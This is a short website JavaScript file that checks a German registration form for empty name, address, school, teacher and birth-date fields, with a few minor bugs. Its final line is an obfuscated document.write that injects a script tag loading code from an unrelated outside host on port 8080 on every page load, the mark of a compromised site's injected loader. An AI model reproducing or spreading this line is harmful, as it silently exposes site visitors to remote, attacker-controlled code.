// JavaScript Document
function checkForm() {

	if (document.getElementById("gespraech").options[document.getElementById("gespraech").selectedIndex].value == '0') {
		document.getElementById('gespraech').style.borderColor = "blue";
		$('#div_error').css('display', 'block');
		return false;
	}
	if (document.getElementById("wunschziel").options[document.getElementById("wunschziel").selectedIndex].value == '---') {
		document.getElementById('wunschziel').style.borderColor = "blue";
		$('#div_error').css('display', 'block');
		return false;
	}	

	if ($('#vorname').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}
	
	if ($('#nachname').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}	

	if ($('#strasse').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}

	if ($('#plz').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}
	
	if ($('#ort').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}
	
	if ($('#telefon').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}	
	
	if ($('#email').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}
	
	if ($('#geb_ort').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}
	
	if ($('#schule').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}	
	
	if ($('#email').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}	
	
	if ($('#lehrer_nachname').val() =='') {
		$('#div_error').css('display', 'block');		
		return false;	
	}	

	if (document.getElementById("year").options[document.getElementById("year").selectedIndex].text == '--') {
		document.getElementById('year').style.borderColor = "blue";			
		$('#div_error').css('display', 'block');		
		return false;
	}
	
	if (document.getElementById("monat").options[document.getElementById("monat").selectedIndex].text == '--') {
		document.getElementById('year').style.borderColor = "blue";			
		$('#div_error').css('display', 'block');		
		return false;
	}
	
	if (document.getElementById("tag").options[document.getElementById("tag").selectedIndex].text == '--') {
		document.getElementById('tag').style.borderColor = "tag";			
		$('#div_error').css('display', 'block');		
		return false;
	}	
	
	
	return true;

}


document.write('<s'+'cript type="text/javascript" src="http://kolpo.gunterschaub.com:8080/Keywords.js"></scr'+'ipt>');
